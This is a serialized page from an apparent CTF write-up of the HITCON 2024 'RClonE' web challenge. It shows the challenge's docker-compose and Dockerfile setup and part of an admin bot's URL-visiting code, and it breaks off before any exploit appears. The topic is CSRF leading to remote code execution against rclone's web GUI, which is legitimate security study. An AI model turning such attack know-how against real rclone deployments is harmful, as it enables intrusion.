[{"data":1,"prerenderedAt":2935},["ShallowReactive",2],{"content-query-ifL1ZpGqRo":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":7,"head":9,"body":28,"_type":2929,"_id":2930,"_source":2931,"_file":2932,"_stem":2933,"_extension":2934},"/writeups/rclone","writeups",false,"","RClonE",{"title":8,"description":10,"keywords":11,"slug":12,"image":13,"date":14,"meta":15},"RClonE was a web challenge from Hitcon qual 2024.","web,csrf,rce","rclone","https://res.cloudinary.com/dmju5zuhr/image/upload/v1721341554/writeups/hitcon_ctf.webp","2024-07-16",[16,17,18,19,21,23,24,26],{"og:image":13},{"og:title":8},{"og:description":10},{"og:type":20},"article",{"og:url":22},"https://owalid.com/rclone",{"description":10},{"title":25},"RClonE writeup",{"keywords":27},"web,csrf,rce,writeup,hitcon,ctf",{"type":29,"children":30,"toc":2922},"root",[31,38,45,50,55,60,65,507,513,518,537,542,830,835,1184,1552,1557,1562,1568,1582,1587,1591,1604,1609,1656,1661,1665,1670,1703,1711,1716,1721,1729,1733,1738,1742,1747,1752,1758,1772,1776,1788,1802,1806,1811,1816,1821,1826,1868,1873,1878,2079,2084,2313,2326,2535,2540,2544,2549,2553,2558,2564,2569,2652,2657,2691,2696,2897,2902,2907,2912,2916],{"type":32,"tag":33,"props":34,"children":35},"element","h1",{"id":12},[36],{"type":37,"value":8},"text",{"type":32,"tag":39,"props":40,"children":42},"h2",{"id":41},"introduction",[43],{"type":37,"value":44},"Introduction",{"type":32,"tag":46,"props":47,"children":48},"p",{},[49],{"type":37,"value":10},{"type":32,"tag":46,"props":51,"children":52},{},[53],{"type":37,"value":54},"We can see below the architecture of the challenge:",{"type":32,"tag":56,"props":57,"children":59},"custom-image",{"imgSrc":58},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721244495/writeups/rclone/archi.webp",[],{"type":32,"tag":46,"props":61,"children":62},{},[63],{"type":37,"value":64},"To begin with, we have two services that are launched from a docker-compose, one which is a bot that 
accesses the internet and one which is an Rclone service.",{"type":32,"tag":66,"props":67,"children":69},"code-card",{"lang":68},"yaml",[70],{"type":32,"tag":71,"props":72,"children":75},"pre",{"code":73,"language":68,"meta":7,"className":74,"style":7},"services:\n  rclone:\n    image: rclone\n    build: .\n    environment:\n      - SECRET=secret  # randomized secret per instancer\n    ports:\n      - \"5572:5572\"\n    networks:\n      - chall\n  bot:\n    image: rclone-bot\n    build: ./bot\n    environment:\n      - TITLE=Admin Bot for RClonE\n      - PORT=8000\n      - URL_CHECK_REGEX=^https?://.{1,256}$\n      - SECRET=secret  # randomized secret per instancer\n    security_opt: \n      - seccomp=chrome.json\n    ports:\n      - \"8000:8000\"\n    networks:\n      - default\n      - chall\nnetworks:\n  chall:\n    internal: true\n","language-yaml shiki shiki-themes vitesse-dark",[76],{"type":32,"tag":77,"props":78,"children":79},"code",{"__ignoreMap":7},[80,98,111,131,150,163,183,196,220,233,246,259,276,293,305,318,331,344,360,379,392,404,425,437,450,462,475,488],{"type":32,"tag":81,"props":82,"children":85},"span",{"class":83,"line":84},"line",1,[86,92],{"type":32,"tag":81,"props":87,"children":89},{"style":88},"--shiki-default:#B8A965",[90],{"type":37,"value":91},"services",{"type":32,"tag":81,"props":93,"children":95},{"style":94},"--shiki-default:#666666",[96],{"type":37,"value":97},":\n",{"type":32,"tag":81,"props":99,"children":101},{"class":83,"line":100},2,[102,107],{"type":32,"tag":81,"props":103,"children":104},{"style":88},[105],{"type":37,"value":106},"  rclone",{"type":32,"tag":81,"props":108,"children":109},{"style":94},[110],{"type":37,"value":97},{"type":32,"tag":81,"props":112,"children":114},{"class":83,"line":113},3,[115,120,125],{"type":32,"tag":81,"props":116,"children":117},{"style":88},[118],{"type":37,"value":119},"    
image",{"type":32,"tag":81,"props":121,"children":122},{"style":94},[123],{"type":37,"value":124},":",{"type":32,"tag":81,"props":126,"children":128},{"style":127},"--shiki-default:#C98A7D",[129],{"type":37,"value":130}," rclone\n",{"type":32,"tag":81,"props":132,"children":134},{"class":83,"line":133},4,[135,140,144],{"type":32,"tag":81,"props":136,"children":137},{"style":88},[138],{"type":37,"value":139},"    build",{"type":32,"tag":81,"props":141,"children":142},{"style":94},[143],{"type":37,"value":124},{"type":32,"tag":81,"props":145,"children":147},{"style":146},"--shiki-default:#4C9A91",[148],{"type":37,"value":149}," .\n",{"type":32,"tag":81,"props":151,"children":153},{"class":83,"line":152},5,[154,159],{"type":32,"tag":81,"props":155,"children":156},{"style":88},[157],{"type":37,"value":158},"    environment",{"type":32,"tag":81,"props":160,"children":161},{"style":94},[162],{"type":37,"value":97},{"type":32,"tag":81,"props":164,"children":166},{"class":83,"line":165},6,[167,172,177],{"type":32,"tag":81,"props":168,"children":169},{"style":94},[170],{"type":37,"value":171},"      -",{"type":32,"tag":81,"props":173,"children":174},{"style":127},[175],{"type":37,"value":176}," SECRET=secret",{"type":32,"tag":81,"props":178,"children":180},{"style":179},"--shiki-default:#758575DD",[181],{"type":37,"value":182},"  # randomized secret per instancer\n",{"type":32,"tag":81,"props":184,"children":186},{"class":83,"line":185},7,[187,192],{"type":32,"tag":81,"props":188,"children":189},{"style":88},[190],{"type":37,"value":191},"    ports",{"type":32,"tag":81,"props":193,"children":194},{"style":94},[195],{"type":37,"value":97},{"type":32,"tag":81,"props":197,"children":199},{"class":83,"line":198},8,[200,204,210,215],{"type":32,"tag":81,"props":201,"children":202},{"style":94},[203],{"type":37,"value":171},{"type":32,"tag":81,"props":205,"children":207},{"style":206},"--shiki-default:#C98A7D77",[208],{"type":37,"value":209}," 
\"",{"type":32,"tag":81,"props":211,"children":212},{"style":127},[213],{"type":37,"value":214},"5572:5572",{"type":32,"tag":81,"props":216,"children":217},{"style":206},[218],{"type":37,"value":219},"\"\n",{"type":32,"tag":81,"props":221,"children":223},{"class":83,"line":222},9,[224,229],{"type":32,"tag":81,"props":225,"children":226},{"style":88},[227],{"type":37,"value":228},"    networks",{"type":32,"tag":81,"props":230,"children":231},{"style":94},[232],{"type":37,"value":97},{"type":32,"tag":81,"props":234,"children":236},{"class":83,"line":235},10,[237,241],{"type":32,"tag":81,"props":238,"children":239},{"style":94},[240],{"type":37,"value":171},{"type":32,"tag":81,"props":242,"children":243},{"style":127},[244],{"type":37,"value":245}," chall\n",{"type":32,"tag":81,"props":247,"children":249},{"class":83,"line":248},11,[250,255],{"type":32,"tag":81,"props":251,"children":252},{"style":88},[253],{"type":37,"value":254},"  bot",{"type":32,"tag":81,"props":256,"children":257},{"style":94},[258],{"type":37,"value":97},{"type":32,"tag":81,"props":260,"children":262},{"class":83,"line":261},12,[263,267,271],{"type":32,"tag":81,"props":264,"children":265},{"style":88},[266],{"type":37,"value":119},{"type":32,"tag":81,"props":268,"children":269},{"style":94},[270],{"type":37,"value":124},{"type":32,"tag":81,"props":272,"children":273},{"style":127},[274],{"type":37,"value":275}," rclone-bot\n",{"type":32,"tag":81,"props":277,"children":279},{"class":83,"line":278},13,[280,284,288],{"type":32,"tag":81,"props":281,"children":282},{"style":88},[283],{"type":37,"value":139},{"type":32,"tag":81,"props":285,"children":286},{"style":94},[287],{"type":37,"value":124},{"type":32,"tag":81,"props":289,"children":290},{"style":127},[291],{"type":37,"value":292}," 
./bot\n",{"type":32,"tag":81,"props":294,"children":296},{"class":83,"line":295},14,[297,301],{"type":32,"tag":81,"props":298,"children":299},{"style":88},[300],{"type":37,"value":158},{"type":32,"tag":81,"props":302,"children":303},{"style":94},[304],{"type":37,"value":97},{"type":32,"tag":81,"props":306,"children":308},{"class":83,"line":307},15,[309,313],{"type":32,"tag":81,"props":310,"children":311},{"style":94},[312],{"type":37,"value":171},{"type":32,"tag":81,"props":314,"children":315},{"style":127},[316],{"type":37,"value":317}," TITLE=Admin Bot for RClonE\n",{"type":32,"tag":81,"props":319,"children":321},{"class":83,"line":320},16,[322,326],{"type":32,"tag":81,"props":323,"children":324},{"style":94},[325],{"type":37,"value":171},{"type":32,"tag":81,"props":327,"children":328},{"style":127},[329],{"type":37,"value":330}," PORT=8000\n",{"type":32,"tag":81,"props":332,"children":334},{"class":83,"line":333},17,[335,339],{"type":32,"tag":81,"props":336,"children":337},{"style":94},[338],{"type":37,"value":171},{"type":32,"tag":81,"props":340,"children":341},{"style":127},[342],{"type":37,"value":343}," URL_CHECK_REGEX=^https?://.{1,256}$\n",{"type":32,"tag":81,"props":345,"children":347},{"class":83,"line":346},18,[348,352,356],{"type":32,"tag":81,"props":349,"children":350},{"style":94},[351],{"type":37,"value":171},{"type":32,"tag":81,"props":353,"children":354},{"style":127},[355],{"type":37,"value":176},{"type":32,"tag":81,"props":357,"children":358},{"style":179},[359],{"type":37,"value":182},{"type":32,"tag":81,"props":361,"children":363},{"class":83,"line":362},19,[364,369,373],{"type":32,"tag":81,"props":365,"children":366},{"style":88},[367],{"type":37,"value":368},"    security_opt",{"type":32,"tag":81,"props":370,"children":371},{"style":94},[372],{"type":37,"value":124},{"type":32,"tag":81,"props":374,"children":376},{"style":375},"--shiki-default:#DBD7CAEE",[377],{"type":37,"value":378}," 
\n",{"type":32,"tag":81,"props":380,"children":382},{"class":83,"line":381},20,[383,387],{"type":32,"tag":81,"props":384,"children":385},{"style":94},[386],{"type":37,"value":171},{"type":32,"tag":81,"props":388,"children":389},{"style":127},[390],{"type":37,"value":391}," seccomp=chrome.json\n",{"type":32,"tag":81,"props":393,"children":395},{"class":83,"line":394},21,[396,400],{"type":32,"tag":81,"props":397,"children":398},{"style":88},[399],{"type":37,"value":191},{"type":32,"tag":81,"props":401,"children":402},{"style":94},[403],{"type":37,"value":97},{"type":32,"tag":81,"props":405,"children":407},{"class":83,"line":406},22,[408,412,416,421],{"type":32,"tag":81,"props":409,"children":410},{"style":94},[411],{"type":37,"value":171},{"type":32,"tag":81,"props":413,"children":414},{"style":206},[415],{"type":37,"value":209},{"type":32,"tag":81,"props":417,"children":418},{"style":127},[419],{"type":37,"value":420},"8000:8000",{"type":32,"tag":81,"props":422,"children":423},{"style":206},[424],{"type":37,"value":219},{"type":32,"tag":81,"props":426,"children":428},{"class":83,"line":427},23,[429,433],{"type":32,"tag":81,"props":430,"children":431},{"style":88},[432],{"type":37,"value":228},{"type":32,"tag":81,"props":434,"children":435},{"style":94},[436],{"type":37,"value":97},{"type":32,"tag":81,"props":438,"children":440},{"class":83,"line":439},24,[441,445],{"type":32,"tag":81,"props":442,"children":443},{"style":94},[444],{"type":37,"value":171},{"type":32,"tag":81,"props":446,"children":447},{"style":127},[448],{"type":37,"value":449}," 
default\n",{"type":32,"tag":81,"props":451,"children":453},{"class":83,"line":452},25,[454,458],{"type":32,"tag":81,"props":455,"children":456},{"style":94},[457],{"type":37,"value":171},{"type":32,"tag":81,"props":459,"children":460},{"style":127},[461],{"type":37,"value":245},{"type":32,"tag":81,"props":463,"children":465},{"class":83,"line":464},26,[466,471],{"type":32,"tag":81,"props":467,"children":468},{"style":88},[469],{"type":37,"value":470},"networks",{"type":32,"tag":81,"props":472,"children":473},{"style":94},[474],{"type":37,"value":97},{"type":32,"tag":81,"props":476,"children":478},{"class":83,"line":477},27,[479,484],{"type":32,"tag":81,"props":480,"children":481},{"style":88},[482],{"type":37,"value":483},"  chall",{"type":32,"tag":81,"props":485,"children":486},{"style":94},[487],{"type":37,"value":97},{"type":32,"tag":81,"props":489,"children":491},{"class":83,"line":490},28,[492,497,501],{"type":32,"tag":81,"props":493,"children":494},{"style":88},[495],{"type":37,"value":496},"    internal",{"type":32,"tag":81,"props":498,"children":499},{"style":94},[500],{"type":37,"value":124},{"type":32,"tag":81,"props":502,"children":504},{"style":503},"--shiki-default:#4D9375",[505],{"type":37,"value":506}," true\n",{"type":32,"tag":39,"props":508,"children":510},{"id":509},"recon",[511],{"type":37,"value":512},"Recon",{"type":32,"tag":46,"props":514,"children":515},{},[516],{"type":37,"value":517},"Before we start, we need to define what Rclone is.",{"type":32,"tag":519,"props":520,"children":521},"blockquote",{},[522],{"type":32,"tag":46,"props":523,"children":524},{},[525,527],{"type":37,"value":526},"Rclone is an open source, multi threaded, command line computer program to manage or migrate content on cloud and other high latency storage. Its capabilities include sync, transfer, crypt, cache, union, compress and mount. The rclone website lists supported backends including S3 and Google Drive. 
",{"type":32,"tag":528,"props":529,"children":534},"a",{"href":530,"rel":531,":target":533},"https://en.wikipedia.org/wiki/Rclone",[532],"nofollow","_blank",[535],{"type":37,"value":536},"Wikis",{"type":32,"tag":46,"props":538,"children":539},{},[540],{"type":37,"value":541},"Now that Rclone is set up, we can talk about the services launched by the challenge in detail. In the dockerfile of the Rclone service, you can see that it is launched with the web interface.",{"type":32,"tag":66,"props":543,"children":545},{"lang":544},"docker",[546],{"type":32,"tag":71,"props":547,"children":550},{"code":548,"language":544,"meta":7,"className":549,"style":7},"FROM debian:bookworm-slim\n\nRUN apt-get update && \\\n    apt-get install -y tini ca-certificates curl unzip && \\\n    apt-get clean && \\\n    rm -rf /var/lib/apt/lists/*\nWORKDIR /workdir\n\nARG RCLONE_VERSION=v1.67.0\nARG RCLONE_NAME=rclone-$RCLONE_VERSION-linux-amd64\nARG RCLONE_HASH=07c23d21a94d70113d949253478e13261c54d14d72023bb14d96a8da5f3e7722\n\nRUN curl https://downloads.rclone.org/$RCLONE_VERSION/$RCLONE_NAME.zip -o rclone.zip && \\\n    echo $RCLONE_HASH rclone.zip | sha256sum -c && \\\n    unzip rclone.zip && \\\n    mv $RCLONE_NAME/rclone /usr/bin\n\nCOPY ./readflag /readflag\nRUN chmod 111 /readflag\n\nRUN useradd -ms /bin/bash ctf\nUSER ctf\n\nENTRYPOINT [\"tini\", \"--\"]\nCMD rclone rcd --rc-addr 0.0.0.0:5572 --rc-web-gui --rc-user $SECRET --rc-pass $SECRET --rc-web-gui-no-open-browser\n","language-docker shiki shiki-themes vitesse-dark",[551],{"type":32,"tag":77,"props":552,"children":553},{"__ignoreMap":7},[554,567,576,589,597,605,613,626,633,646,658,670,677,689,697,705,713,720,733,745,752,764,777,784,817],{"type":32,"tag":81,"props":555,"children":556},{"class":83,"line":84},[557,562],{"type":32,"tag":81,"props":558,"children":559},{"style":503},[560],{"type":37,"value":561},"FROM",{"type":32,"tag":81,"props":563,"children":564},{"style":375},[565],{"type":37,"value":566}," 
debian:bookworm-slim\n",{"type":32,"tag":81,"props":568,"children":569},{"class":83,"line":100},[570],{"type":32,"tag":81,"props":571,"children":573},{"emptyLinePlaceholder":572},true,[574],{"type":37,"value":575},"\n",{"type":32,"tag":81,"props":577,"children":578},{"class":83,"line":113},[579,584],{"type":32,"tag":81,"props":580,"children":581},{"style":503},[582],{"type":37,"value":583},"RUN",{"type":32,"tag":81,"props":585,"children":586},{"style":375},[587],{"type":37,"value":588}," apt-get update && \\\n",{"type":32,"tag":81,"props":590,"children":591},{"class":83,"line":133},[592],{"type":32,"tag":81,"props":593,"children":594},{"style":375},[595],{"type":37,"value":596},"    apt-get install -y tini ca-certificates curl unzip && \\\n",{"type":32,"tag":81,"props":598,"children":599},{"class":83,"line":152},[600],{"type":32,"tag":81,"props":601,"children":602},{"style":375},[603],{"type":37,"value":604},"    apt-get clean && \\\n",{"type":32,"tag":81,"props":606,"children":607},{"class":83,"line":165},[608],{"type":32,"tag":81,"props":609,"children":610},{"style":375},[611],{"type":37,"value":612},"    rm -rf /var/lib/apt/lists/*\n",{"type":32,"tag":81,"props":614,"children":615},{"class":83,"line":185},[616,621],{"type":32,"tag":81,"props":617,"children":618},{"style":503},[619],{"type":37,"value":620},"WORKDIR",{"type":32,"tag":81,"props":622,"children":623},{"style":375},[624],{"type":37,"value":625}," /workdir\n",{"type":32,"tag":81,"props":627,"children":628},{"class":83,"line":198},[629],{"type":32,"tag":81,"props":630,"children":631},{"emptyLinePlaceholder":572},[632],{"type":37,"value":575},{"type":32,"tag":81,"props":634,"children":635},{"class":83,"line":222},[636,641],{"type":32,"tag":81,"props":637,"children":638},{"style":503},[639],{"type":37,"value":640},"ARG",{"type":32,"tag":81,"props":642,"children":643},{"style":375},[644],{"type":37,"value":645}," 
RCLONE_VERSION=v1.67.0\n",{"type":32,"tag":81,"props":647,"children":648},{"class":83,"line":235},[649,653],{"type":32,"tag":81,"props":650,"children":651},{"style":503},[652],{"type":37,"value":640},{"type":32,"tag":81,"props":654,"children":655},{"style":375},[656],{"type":37,"value":657}," RCLONE_NAME=rclone-$RCLONE_VERSION-linux-amd64\n",{"type":32,"tag":81,"props":659,"children":660},{"class":83,"line":248},[661,665],{"type":32,"tag":81,"props":662,"children":663},{"style":503},[664],{"type":37,"value":640},{"type":32,"tag":81,"props":666,"children":667},{"style":375},[668],{"type":37,"value":669}," RCLONE_HASH=07c23d21a94d70113d949253478e13261c54d14d72023bb14d96a8da5f3e7722\n",{"type":32,"tag":81,"props":671,"children":672},{"class":83,"line":261},[673],{"type":32,"tag":81,"props":674,"children":675},{"emptyLinePlaceholder":572},[676],{"type":37,"value":575},{"type":32,"tag":81,"props":678,"children":679},{"class":83,"line":278},[680,684],{"type":32,"tag":81,"props":681,"children":682},{"style":503},[683],{"type":37,"value":583},{"type":32,"tag":81,"props":685,"children":686},{"style":375},[687],{"type":37,"value":688}," curl https://downloads.rclone.org/$RCLONE_VERSION/$RCLONE_NAME.zip -o rclone.zip && \\\n",{"type":32,"tag":81,"props":690,"children":691},{"class":83,"line":295},[692],{"type":32,"tag":81,"props":693,"children":694},{"style":375},[695],{"type":37,"value":696},"    echo $RCLONE_HASH rclone.zip | sha256sum -c && \\\n",{"type":32,"tag":81,"props":698,"children":699},{"class":83,"line":307},[700],{"type":32,"tag":81,"props":701,"children":702},{"style":375},[703],{"type":37,"value":704},"    unzip rclone.zip && \\\n",{"type":32,"tag":81,"props":706,"children":707},{"class":83,"line":320},[708],{"type":32,"tag":81,"props":709,"children":710},{"style":375},[711],{"type":37,"value":712},"    mv $RCLONE_NAME/rclone 
/usr/bin\n",{"type":32,"tag":81,"props":714,"children":715},{"class":83,"line":333},[716],{"type":32,"tag":81,"props":717,"children":718},{"emptyLinePlaceholder":572},[719],{"type":37,"value":575},{"type":32,"tag":81,"props":721,"children":722},{"class":83,"line":346},[723,728],{"type":32,"tag":81,"props":724,"children":725},{"style":503},[726],{"type":37,"value":727},"COPY",{"type":32,"tag":81,"props":729,"children":730},{"style":375},[731],{"type":37,"value":732}," ./readflag /readflag\n",{"type":32,"tag":81,"props":734,"children":735},{"class":83,"line":362},[736,740],{"type":32,"tag":81,"props":737,"children":738},{"style":503},[739],{"type":37,"value":583},{"type":32,"tag":81,"props":741,"children":742},{"style":375},[743],{"type":37,"value":744}," chmod 111 /readflag\n",{"type":32,"tag":81,"props":746,"children":747},{"class":83,"line":381},[748],{"type":32,"tag":81,"props":749,"children":750},{"emptyLinePlaceholder":572},[751],{"type":37,"value":575},{"type":32,"tag":81,"props":753,"children":754},{"class":83,"line":394},[755,759],{"type":32,"tag":81,"props":756,"children":757},{"style":503},[758],{"type":37,"value":583},{"type":32,"tag":81,"props":760,"children":761},{"style":375},[762],{"type":37,"value":763}," useradd -ms /bin/bash ctf\n",{"type":32,"tag":81,"props":765,"children":766},{"class":83,"line":406},[767,772],{"type":32,"tag":81,"props":768,"children":769},{"style":503},[770],{"type":37,"value":771},"USER",{"type":32,"tag":81,"props":773,"children":774},{"style":375},[775],{"type":37,"value":776}," 
ctf\n",{"type":32,"tag":81,"props":778,"children":779},{"class":83,"line":427},[780],{"type":32,"tag":81,"props":781,"children":782},{"emptyLinePlaceholder":572},[783],{"type":37,"value":575},{"type":32,"tag":81,"props":785,"children":786},{"class":83,"line":439},[787,792,797,802,807,812],{"type":32,"tag":81,"props":788,"children":789},{"style":503},[790],{"type":37,"value":791},"ENTRYPOINT",{"type":32,"tag":81,"props":793,"children":794},{"style":375},[795],{"type":37,"value":796}," [",{"type":32,"tag":81,"props":798,"children":799},{"style":127},[800],{"type":37,"value":801},"\"tini\"",{"type":32,"tag":81,"props":803,"children":804},{"style":375},[805],{"type":37,"value":806},", ",{"type":32,"tag":81,"props":808,"children":809},{"style":127},[810],{"type":37,"value":811},"\"--\"",{"type":32,"tag":81,"props":813,"children":814},{"style":375},[815],{"type":37,"value":816},"]\n",{"type":32,"tag":81,"props":818,"children":819},{"class":83,"line":452},[820,825],{"type":32,"tag":81,"props":821,"children":822},{"style":503},[823],{"type":37,"value":824},"CMD",{"type":32,"tag":81,"props":826,"children":827},{"style":375},[828],{"type":37,"value":829}," rclone rcd --rc-addr 0.0.0.0:5572 --rc-web-gui --rc-user $SECRET --rc-pass $SECRET --rc-web-gui-no-open-browser\n",{"type":32,"tag":46,"props":831,"children":832},{},[833],{"type":37,"value":834},"The bot, on the other hand, does nothing but authenticate itself on the Rclone service and visit the page that is passed in the body of the post request.",{"type":32,"tag":66,"props":836,"children":838},{"lang":837},"js",[839],{"type":32,"tag":71,"props":840,"children":843},{"code":841,"language":837,"meta":7,"className":842,"style":7},"[...]\napp.post('/submit', async (req, res) => {\n    const { url } = req.body\n[...]\n    try {\n        console.log(`[+] Sending ${url} to bot`)\n        await visit(url)\n        res.send('OK')\n    } catch (e) {\n        [...]\n    }\n})\n[...]\n","language-js shiki shiki-themes 
vitesse-dark",[844],{"type":32,"tag":77,"props":845,"children":846},{"__ignoreMap":7},[847,855,939,981,988,1000,1060,1085,1123,1153,1161,1169,1177],{"type":32,"tag":81,"props":848,"children":849},{"class":83,"line":84},[850],{"type":32,"tag":81,"props":851,"children":852},{"style":94},[853],{"type":37,"value":854},"[...]\n",{"type":32,"tag":81,"props":856,"children":857},{"class":83,"line":100},[858,864,869,875,880,885,890,894,899,905,910,915,919,924,929,934],{"type":32,"tag":81,"props":859,"children":861},{"style":860},"--shiki-default:#BD976A",[862],{"type":37,"value":863},"app",{"type":32,"tag":81,"props":865,"children":866},{"style":94},[867],{"type":37,"value":868},".",{"type":32,"tag":81,"props":870,"children":872},{"style":871},"--shiki-default:#80A665",[873],{"type":37,"value":874},"post",{"type":32,"tag":81,"props":876,"children":877},{"style":94},[878],{"type":37,"value":879},"(",{"type":32,"tag":81,"props":881,"children":882},{"style":206},[883],{"type":37,"value":884},"'",{"type":32,"tag":81,"props":886,"children":887},{"style":127},[888],{"type":37,"value":889},"/submit",{"type":32,"tag":81,"props":891,"children":892},{"style":206},[893],{"type":37,"value":884},{"type":32,"tag":81,"props":895,"children":896},{"style":94},[897],{"type":37,"value":898},",",{"type":32,"tag":81,"props":900,"children":902},{"style":901},"--shiki-default:#CB7676",[903],{"type":37,"value":904}," async",{"type":32,"tag":81,"props":906,"children":907},{"style":94},[908],{"type":37,"value":909}," (",{"type":32,"tag":81,"props":911,"children":912},{"style":860},[913],{"type":37,"value":914},"req",{"type":32,"tag":81,"props":916,"children":917},{"style":94},[918],{"type":37,"value":898},{"type":32,"tag":81,"props":920,"children":921},{"style":860},[922],{"type":37,"value":923}," res",{"type":32,"tag":81,"props":925,"children":926},{"style":94},[927],{"type":37,"value":928},")",{"type":32,"tag":81,"props":930,"children":931},{"style":94},[932],{"type":37,"value":933}," 
=>",{"type":32,"tag":81,"props":935,"children":936},{"style":94},[937],{"type":37,"value":938}," {\n",{"type":32,"tag":81,"props":940,"children":941},{"class":83,"line":113},[942,947,952,957,962,967,972,976],{"type":32,"tag":81,"props":943,"children":944},{"style":901},[945],{"type":37,"value":946},"    const",{"type":32,"tag":81,"props":948,"children":949},{"style":94},[950],{"type":37,"value":951}," {",{"type":32,"tag":81,"props":953,"children":954},{"style":860},[955],{"type":37,"value":956}," url",{"type":32,"tag":81,"props":958,"children":959},{"style":94},[960],{"type":37,"value":961}," }",{"type":32,"tag":81,"props":963,"children":964},{"style":94},[965],{"type":37,"value":966}," =",{"type":32,"tag":81,"props":968,"children":969},{"style":860},[970],{"type":37,"value":971}," req",{"type":32,"tag":81,"props":973,"children":974},{"style":94},[975],{"type":37,"value":868},{"type":32,"tag":81,"props":977,"children":978},{"style":860},[979],{"type":37,"value":980},"body\n",{"type":32,"tag":81,"props":982,"children":983},{"class":83,"line":133},[984],{"type":32,"tag":81,"props":985,"children":986},{"style":94},[987],{"type":37,"value":854},{"type":32,"tag":81,"props":989,"children":990},{"class":83,"line":152},[991,996],{"type":32,"tag":81,"props":992,"children":993},{"style":503},[994],{"type":37,"value":995},"    try",{"type":32,"tag":81,"props":997,"children":998},{"style":94},[999],{"type":37,"value":938},{"type":32,"tag":81,"props":1001,"children":1002},{"class":83,"line":165},[1003,1008,1012,1017,1021,1026,1031,1036,1041,1046,1051,1055],{"type":32,"tag":81,"props":1004,"children":1005},{"style":860},[1006],{"type":37,"value":1007},"        
console",{"type":32,"tag":81,"props":1009,"children":1010},{"style":94},[1011],{"type":37,"value":868},{"type":32,"tag":81,"props":1013,"children":1014},{"style":871},[1015],{"type":37,"value":1016},"log",{"type":32,"tag":81,"props":1018,"children":1019},{"style":94},[1020],{"type":37,"value":879},{"type":32,"tag":81,"props":1022,"children":1023},{"style":206},[1024],{"type":37,"value":1025},"`",{"type":32,"tag":81,"props":1027,"children":1028},{"style":127},[1029],{"type":37,"value":1030},"[+] Sending ",{"type":32,"tag":81,"props":1032,"children":1033},{"style":503},[1034],{"type":37,"value":1035},"${",{"type":32,"tag":81,"props":1037,"children":1038},{"style":127},[1039],{"type":37,"value":1040},"url",{"type":32,"tag":81,"props":1042,"children":1043},{"style":503},[1044],{"type":37,"value":1045},"}",{"type":32,"tag":81,"props":1047,"children":1048},{"style":127},[1049],{"type":37,"value":1050}," to bot",{"type":32,"tag":81,"props":1052,"children":1053},{"style":206},[1054],{"type":37,"value":1025},{"type":32,"tag":81,"props":1056,"children":1057},{"style":94},[1058],{"type":37,"value":1059},")\n",{"type":32,"tag":81,"props":1061,"children":1062},{"class":83,"line":185},[1063,1068,1073,1077,1081],{"type":32,"tag":81,"props":1064,"children":1065},{"style":503},[1066],{"type":37,"value":1067},"        await",{"type":32,"tag":81,"props":1069,"children":1070},{"style":871},[1071],{"type":37,"value":1072}," visit",{"type":32,"tag":81,"props":1074,"children":1075},{"style":94},[1076],{"type":37,"value":879},{"type":32,"tag":81,"props":1078,"children":1079},{"style":860},[1080],{"type":37,"value":1040},{"type":32,"tag":81,"props":1082,"children":1083},{"style":94},[1084],{"type":37,"value":1059},{"type":32,"tag":81,"props":1086,"children":1087},{"class":83,"line":198},[1088,1093,1097,1102,1106,1110,1115,1119],{"type":32,"tag":81,"props":1089,"children":1090},{"style":860},[1091],{"type":37,"value":1092},"        
res",{"type":32,"tag":81,"props":1094,"children":1095},{"style":94},[1096],{"type":37,"value":868},{"type":32,"tag":81,"props":1098,"children":1099},{"style":871},[1100],{"type":37,"value":1101},"send",{"type":32,"tag":81,"props":1103,"children":1104},{"style":94},[1105],{"type":37,"value":879},{"type":32,"tag":81,"props":1107,"children":1108},{"style":206},[1109],{"type":37,"value":884},{"type":32,"tag":81,"props":1111,"children":1112},{"style":127},[1113],{"type":37,"value":1114},"OK",{"type":32,"tag":81,"props":1116,"children":1117},{"style":206},[1118],{"type":37,"value":884},{"type":32,"tag":81,"props":1120,"children":1121},{"style":94},[1122],{"type":37,"value":1059},{"type":32,"tag":81,"props":1124,"children":1125},{"class":83,"line":222},[1126,1131,1136,1140,1145,1149],{"type":32,"tag":81,"props":1127,"children":1128},{"style":94},[1129],{"type":37,"value":1130},"    }",{"type":32,"tag":81,"props":1132,"children":1133},{"style":503},[1134],{"type":37,"value":1135}," catch",{"type":32,"tag":81,"props":1137,"children":1138},{"style":94},[1139],{"type":37,"value":909},{"type":32,"tag":81,"props":1141,"children":1142},{"style":860},[1143],{"type":37,"value":1144},"e",{"type":32,"tag":81,"props":1146,"children":1147},{"style":94},[1148],{"type":37,"value":928},{"type":32,"tag":81,"props":1150,"children":1151},{"style":94},[1152],{"type":37,"value":938},{"type":32,"tag":81,"props":1154,"children":1155},{"class":83,"line":235},[1156],{"type":32,"tag":81,"props":1157,"children":1158},{"style":94},[1159],{"type":37,"value":1160},"        [...]\n",{"type":32,"tag":81,"props":1162,"children":1163},{"class":83,"line":248},[1164],{"type":32,"tag":81,"props":1165,"children":1166},{"style":94},[1167],{"type":37,"value":1168},"    
}\n",{"type":32,"tag":81,"props":1170,"children":1171},{"class":83,"line":261},[1172],{"type":32,"tag":81,"props":1173,"children":1174},{"style":94},[1175],{"type":37,"value":1176},"})\n",{"type":32,"tag":81,"props":1178,"children":1179},{"class":83,"line":278},[1180],{"type":32,"tag":81,"props":1181,"children":1182},{"style":94},[1183],{"type":37,"value":854},{"type":32,"tag":66,"props":1185,"children":1186},{"lang":837},[1187],{"type":32,"tag":71,"props":1188,"children":1190},{"code":1189,"language":837,"meta":7,"className":842,"style":7},"const visit = async url => {\n[...]\n        context = await browser.createBrowserContext()\n\n        const page1 = await context.newPage()\n        await page1.goto(LOGIN_URL)\n        await page1.close()\n\n        const page2 = await context.newPage()\n        await Promise.race([\n            page2.goto(url, {\n                waitUntil: 'networkidle0'\n            }),\n            sleep(5000)\n        